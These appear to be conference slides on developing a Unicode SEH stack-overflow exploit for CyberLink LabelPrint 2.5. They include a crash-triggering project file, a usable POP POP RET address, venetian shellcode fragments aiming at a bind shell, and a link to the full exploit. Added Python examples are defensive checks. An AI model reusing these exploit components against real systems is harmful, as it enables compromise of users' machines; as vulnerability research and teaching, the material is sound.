CyberLink LabelPrint 2.5 Exploitation Process
Exploit Development: CyberLink LabelPrint 2.5 Unicode Stack Overflow
IT Audit & IT Security Meetup #4 - Sharing in the Cloud
Indonesian Cloud, Jakarta, 13 October 2017
Who?
Thomas Gregory - @modpr0be
IT Security consultant @Spentera
Security researcher (occasionally)
focus on Windows exploitation
IT Security trainer (sometimes)
f3ci - ????
Security researcher
Penetration tester, red team
Appsec & simple exploit dev
What?
CyberLink LabelPrint 2.5
Labeling software
Embedded by default in a CyberLink Power2Go installation.
Included as bloatware in all Lenovo, HP, and Asus laptops somewhere between 2015 and 2016.
Why?
The exploit development is quite challenging and interesting.
We want to share it for education purposes only.
Let's Begin
The Fuzz
Fuzzing possibilities
File input: import, open media, open project
Registry overflow
Tools
Immunity Debugger with the mona plugin
Editor/IDE (/me using Sublime Text)
LabelPrint Project
Project file with extension .lpp
Header:
<PROJECT version="1.0.00">
<INFORMATION title="" author="" date="7/24/2017" SystemTime="24/07/2017">
<TRACK name="" />
The Bug
In the name attribute of the TRACK tag:
<PROJECT version="1.0.00">
<INFORMATION title="" author="" date="7/24/2017" SystemTime="24/07/2017">
<TRACK
name="AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAA" />
</INFORMATION>
</PROJECT>
SEH Overwritten
The SE Handler is overwritten.
Unicode based: AA (4141) ends up as .A.A in memory, i.e. 00410041.
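A defensive pre-check for the input described above, as an added example (not code from the slides or from CyberLink): it parses a project file in the .lpp layout shown, expands every attribute value to UTF-16LE the way the application's ANSI-to-Unicode conversion does, and reports attributes whose expanded size exceeds a chosen limit. The 256-byte limit, the `scan_lpp`/`unicode_expand` names and the sample document are assumptions constructed for this example; the 600-character TRACK name is deliberately oversized so that the check fires.

```python
# Added example: flag oversized attributes in a LabelPrint-style .lpp project file
# before it reaches the vulnerable parser. The file layout mirrors the slides; the
# limit and the sample document are constructed for illustration.
import xml.etree.ElementTree as ET

# Constructed sample in the slide's layout; the TRACK name is long on purpose.
SAMPLE_LPP = (
    '<PROJECT version="1.0.00">'
    '<INFORMATION title="" author="" date="7/24/2017" SystemTime="24/07/2017">'
    '<TRACK name="' + "A" * 600 + '" />'
    '</INFORMATION>'
    '</PROJECT>'
)


def unicode_expand(value: str) -> bytes:
    """UTF-16LE bytes the application sees after ANSI->Unicode conversion.
    "AA" (0x41 0x41) becomes b"A\\x00A\\x00": every ASCII byte gains a 0x00 neighbour."""
    return value.encode("utf-16-le")


def as_dword(pair: str) -> int:
    """Little-endian dword formed by the first two characters after expansion,
    e.g. "AA" -> 0x00410041, the value seen in the overwritten SEH record."""
    return int.from_bytes(unicode_expand(pair[:2]), "little")


def scan_lpp(xml_text: str, limit: int = 256):
    """Return (tag, attribute, char_count, utf16_byte_count) for every attribute
    whose Unicode-expanded size is above `limit` bytes. Empty list means clean."""
    findings = []
    root = ET.fromstring(xml_text)
    for elem in root.iter():
        for attr, value in elem.attrib.items():
            expanded = unicode_expand(value)
            if len(expanded) > limit:
                findings.append((elem.tag, attr, len(value), len(expanded)))
    return findings


if __name__ == "__main__":
    print(hex(as_dword("AA")))  # the 00410041 pattern from the slides
    for tag, attr, chars, size in scan_lpp(SAMPLE_LPP):
        print(f"{tag}@{attr}: {chars} chars -> {size} bytes after Unicode expansion")
```

The expanded length is reported, not the character count, because the overflow happens after conversion: a 600-character name becomes 1200 bytes on the stack.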
What is SEH?
"A piece of code that is written inside an application, with the purpose of dealing with the fact that the application throws an exception" (taken from corelan)
An exception is an event, which occurs during the execution of a program, that disrupts the normal flow of the program's instructions.
A catcher, who is trying to catch unusual behavior.
What is SEH?
This structure (also called a SEH record) is 8 bytes and has 2 (4-byte) elements:
a pointer to the next exception registration structure (in essence, to the next SEH record, in case the current handler is unable to handle the exception)
a pointer to the address of the actual code of the exception handler (SE Handler)
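The 8-byte record layout just described, walked over a constructed 32-bit stack snapshot as an added example (not code from the slides or from any debugger plugin): each record is read as two little-endian dwords, the chain is followed through the "next" pointers until the 0xFFFFFFFF terminator, and a record is flagged when its handler points onto the stack, outside the module range, equals its own "next" pointer, or has the shape of a Unicode-expanded ASCII pair such as 0x00410041. The stack base, module range, record offsets and handler values are assumptions made up for the snapshot.

```python
# Added example: parse and sanity-check an SEH chain from a constructed stack image.
# Addresses are invented; the second record imitates the 0x00410041 overwrite
# from the slides so the walk shows what a corrupted chain looks like.
import struct

STACK_BASE = 0x0012F000                  # constructed: start address of the fake stack snapshot
MODULE_RANGE = (0x00400000, 0x00480000)  # constructed: pretend image range of the main executable
CHAIN_END = 0xFFFFFFFF                   # the last record's "next" pointer is always -1


def looks_unicode_filler(value):
    """True for dwords shaped like a repeated ASCII char after Unicode expansion
    ("AA" -> 0x00410041): both high bytes are zero and both 16-bit halves are equal."""
    return (value & 0xFF00FF00) == 0 and (value & 0xFFFF) == (value >> 16)


def build_snapshot():
    """Constructed stack image: a healthy record at +0x10 whose next pointer leads to
    a record at +0x40 that has been overwritten with 0x00410041 in both fields."""
    mem = bytearray(0x200)
    struct.pack_into("<II", mem, 0x10, STACK_BASE + 0x40, 0x00401234)
    struct.pack_into("<II", mem, 0x40, 0x00410041, 0x00410041)
    return bytes(mem)


def walk_seh_chain(mem, first_record, base=STACK_BASE, module=MODULE_RANGE, max_records=64):
    """Follow the chain and describe each record; stops when the next pointer leaves the
    snapshot, loops, or hits the terminator."""
    records = []
    addr = first_record
    seen = set()
    while addr != CHAIN_END and len(records) < max_records:
        off = addr - base
        if addr in seen or off < 0 or off + 8 > len(mem):
            records.append({"addr": addr, "error": "next pointer leaves the snapshot or loops"})
            break
        seen.add(addr)
        nxt, handler = struct.unpack_from("<II", mem, off)  # [next record][SE handler]
        in_module = module[0] <= handler < module[1]
        on_stack = base <= handler < base + len(mem)
        records.append({
            "addr": addr,
            "next": nxt,
            "handler": handler,
            "suspicious": (not in_module) or on_stack or nxt == handler
                          or looks_unicode_filler(handler),
        })
        addr = nxt
    return records


def suspicious_records(mem, first_record):
    """Only the records a reviewer needs to look at."""
    return [r for r in walk_seh_chain(mem, first_record) if r.get("suspicious") or "error" in r]


if __name__ == "__main__":
    for rec in walk_seh_chain(build_snapshot(), STACK_BASE + 0x10):
        print({k: (hex(v) if isinstance(v, int) else v) for k, v in rec.items()})
```

Note that the module-range check alone would not catch the overwritten record here, since 0x00410041 falls inside a typical image range; the equal-fields and Unicode-shape checks are what make it stand out, which is the same reason a debugger's chain listing shows the corruption so clearly.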
Abusing SEH
In other words, the payload must do the following things:
Cause an exception. Without an exception, the SEH handler (the one you have overwritten/control) won’t kick in.
Overwrite the pointer to the next SEH record with some jumpcode (so it can jump to the shellcode)
Overwrite the SE handler with a pointer to an instruction that will bring you back to next SEH and execute the jumpcode.
The shellcode should be directly after the overwritten SE Handler. Some small jumpcode contained in the overwritten “pointer to next SEH record” will jump to it.
Abusing SEH
When the exception occurs, the stack will look like this:
Possible values to overwrite the SE Handler with are POP something, POP something, RETN to the stack.
It will POP the address that sits at the top of the stack, POP again to take the second address, and RETN to execute the third address (which is now at the top of the stack).
The third address is usually our supplied input buffer.
[Figure: stack layout at the time of the exception; labels: "Top of stack", "Our pointer to next SEH address"]
Abusing SEH
Image was taken from http://corelan.be with permission from Peter van Eeckhoutte (Corelan)
Unicode?
Unicode allows us to visually represent and/or manipulate text in most of the systems across the world in a consistent manner.
Unicode based exploits are usually involved in file/folder naming, or in the part of an input parameter that deals with naming.
More Info
Structured Exception Handler (SEH)
https://msdn.microsoft.com/en-us/library/windows/desktop/ms680657(v=vs.85).aspx
https://www.corelan.be/index.php/2009/07/25/writing-buffer-overflow-exploits-a-quick-and-basic-tutorial-part-3-seh/
https://blog.spentera.com/2011/09/14/seh-based-stack-overflow-the-basic/
Unicode based exploit
https://www.corelan.be/index.php/2009/11/06/exploit-writing-tutorial-part-7-unicode-from-0x00410041-to-calc/
SEH + Unicode = Venetian
Probably the most hated combination
Venetian Shellcode
One of the registers must point at the beginning of the shellcode.
One register must point at a memory location that is writeable (and where it's ok to write the new reassembled shellcode).
Normal venetian prepend shellcode
Push another register to stack (ESP)
Pop stack (ESP) into EAX
Align the EAX register with add/sub instruction
Push EAX register into stack (ESP)
RET (return to the beginning of shellcode at EAX)
Sadly, we won’t face a normal venetian approach
Typical Venetian Unicode
Prepend Opcode
Align EAX Register: if we use EAX as BufferRegister, we need to align EAX to point to our buffer.
"Stack Walking": walk over the Next SEH and SEH.
RET to Shellcode: shellcode executed.
Typical Venetian Unicode
Prepend Opcode (use EAX as BufferRegister; the add/sub values depend on where our buffer is):
ven = "\x56" #push esi
ven += "\x41" #align
ven += "\x58" #pop eax
ven += "\x41" #align
ven += "\x05\x04\x01" #add eax,01000400
ven += "\x41" #align
ven += "\x2d\x01\x01" #sub eax,01000100
ven += "\x41" #align
ven += "\x50" #push eax
ven += "\x41" #align
ven += "\xc3" #ret
Problem?
Limited instructions (because of Unicode)
Need to find a Unicode-friendly POP POP RET
All hex values between 0x80 and 0xFF are marked as bad
Yes, the RET opcode (C3) is also included in the bad character list.
Meanwhile, our venetian shellcode needs RET
Typical Venetian
Sh*t!
Solution
Find a proper Unicode-friendly PPR (pop pop ret) instruction address somewhere in the library or executable
Create "our version" of RET
Fill the stack (ESP) with our shellcode
Point our RET to a CALL ESP instruction address. This will alter the flow of execution.
EAX must be pointing to the beginning of our shellcode.
"Stack walk" until we meet the shellcode.
Our Venetian Unicode Shellcode
Align EAX register
Calculate where RET will be placed
Construct RET in EAX
Calculate EAX for the CALL ESP opcode
Reaching RET, execute CALL ESP
Re-align EAX
"Stack walk" to shellcode
Bind shell 4444
pop pop ret
!mona seh
Fortunately, we found one address that is Unicode friendly (0x0044002c) in the main program (LabelPrint.exe).
Construct RET (1)
Calculate the value of the EAX register, preparing the address where we want the decoded RET to be placed later on the stack.
Limited calculation (because of Unicode)
Zero the EAX register first:
xor eax,eax
Construct RET (2)
Preparing the address to push our RET:
push esp
pop eax
ADD 01001B00 to EAX, then SUB 01000100 from EAX (as in the code below)
push eax
pop esp
ven += "\x42" #nop
ven += "\x54" #push esp
ven += "\x42" #nop
ven += "\x58" #pop eax
ven += "\x42" #nop
ven += "\x05\x1B\x01" #add eax,01001B00
ven += "\x42" #nop
ven += "\x2d\x01\x01" #sub eax,01000100
ven += "\x42" #nop
ven += "\x50" #push eax
ven += "\x42" #nop
ven += "\x5c" #pop esp
Construct RET (3)
After the calculation in EAX, the stack (ESP) will now be pointing at 0x0012F655 (the same value as EAX).
This is important for our RET decoding address later.
Construct RET (4)
Zeroing Out EAX
We need to clear the EAX register for the next calculation of the RET opcode.
After EAX is zeroed out we can calculate the EAX register to meet 0xC300C300 (RET opcode).
We can perform the zeroing with the AND operand:
AND EAX with 7e007e00
AND EAX with 01000100
Zeroing Out EAX
ven += "\x42" #nop
ven += "\x25\x7e\x7e" #and eax,7e007e00
ven += "\x42" #nop
ven += "\x25\x01\x01" #and eax,01000100
Construct RET (5)
Preparing the RET opcode:
Zero out EAX first (done)
XOR EAX with 7f007f00
ADD EAX with 44004400
PUSH EDI
PUSH EAX
The RET Opcode (1)
ven += "\x35\x7f\x7f" #xor eax,7f007f00
ven += "\x42" #nop
ven += "\x05\x44\x44" #add eax,44004400
ven += "\x42" #nop
ven += "\x57" #push edi/padding
ven += "\x42" #nop
ven += "\x50" #push eax
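The register arithmetic in the "Zeroing Out EAX" and "Construct RET (5)" steps, replayed as an added example (not code from the slides) so an analyst reading the exploit can confirm the claims without a debugger: the two ANDs clear EAX from any starting value, and XOR 7f007f00 followed by ADD 44004400 yields 0xC300C300. The `unicode_safe` helper is an assumption that encodes the slides' 0x80-0xFF bad-character rule for a 32-bit immediate, and shows why 0xC300C300 cannot simply be written into the buffer and has to be computed instead.

```python
# Added example: 32-bit model of the EAX arithmetic from the slides. Only the
# four operations the prologue uses are modelled; nothing here is machine code.
MASK32 = 0xFFFFFFFF


def apply(eax, op, imm):
    """Apply one instruction to EAX with 32-bit wraparound."""
    if op == "and":
        return eax & imm
    if op == "xor":
        return eax ^ imm
    if op == "add":
        return (eax + imm) & MASK32
    if op == "sub":
        return (eax - imm) & MASK32
    raise ValueError(f"unsupported op {op!r}")


def run(eax, steps):
    """Run a list of (op, immediate) pairs and return the final EAX."""
    for op, imm in steps:
        eax = apply(eax, op, imm)
    return eax


# The step sequences exactly as the slides give them.
ZERO_EAX = [("and", 0x7E007E00), ("and", 0x01000100)]   # 7e007e00 & 01000100 == 0
RET_OPCODE = [("xor", 0x7F007F00), ("add", 0x44004400)]  # 7f007f00 + 44004400 == c300c300


def zero_eax(eax):
    return run(eax, ZERO_EAX)


def build_ret_opcode(start=0xDEADBEEF):
    """Zero EAX from an arbitrary value, then decode the RET pair."""
    return run(zero_eax(start), RET_OPCODE)


def unicode_safe(imm):
    """Assumed check for the slides' constraint: after Unicode expansion a 32-bit
    immediate must look like 00 XX 00 YY (little-endian bytes) with XX, YY < 0x80."""
    return (imm & 0x00FF00FF) == 0 and ((imm >> 8) & 0xFF) < 0x80 and ((imm >> 24) & 0xFF) < 0x80


if __name__ == "__main__":
    print(hex(zero_eax(0xDEADBEEF)), hex(build_ret_opcode()))
    for imm in (0x7E007E00, 0x01000100, 0x7F007F00, 0x44004400, 0xC300C300):
        print(hex(imm), "usable as immediate" if unicode_safe(imm) else "contains a bad byte")
```

Every immediate the slides use passes `unicode_safe`, while the target value 0xC300C300 fails it (0xC3 is in the bad range), which is the whole reason for the XOR/ADD detour.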
The RET Opcode (2)
Construct CALL to ESP (1)
Construct CALL to ESP (2)
Construct CALL to ESP (3)
Stack Walk to Shellcode
Our Venetian Shellcode
ven += "\x58" #pop eax
ven += "\x42" #nop
ven += "\x58" #pop eax
ven += "\x42" #nop
ven += "\x05\x10\x01" #add eax,01001000, align eax to our buffer
ven += "\x42" #nop
ven += "\x2d\x0e\x01" #sub eax,01000e00, align eax to our buffer
ven += "\x42" #nop
ven += "\x50" #push eax
ven += "\x42" #nop
ven += "\x5C" #pop esp
ven += "\x42" #nop
ven += "\x58" #pop eax
ven += "\x42" #nop
ven += "\x05\x53\x7c" #add eax,7c005300, part of call esp
ven += "\x42" #nop
ven += "\x50" #push eax
ven += "\x42" * 68 #padding to fill the stack
ven += "\x7b\x32" #part of call esp
Final Exploit
https://www.exploit-db.com/exploits/42777/
Solution
For now, do not use CyberLink LabelPrint.
Thank you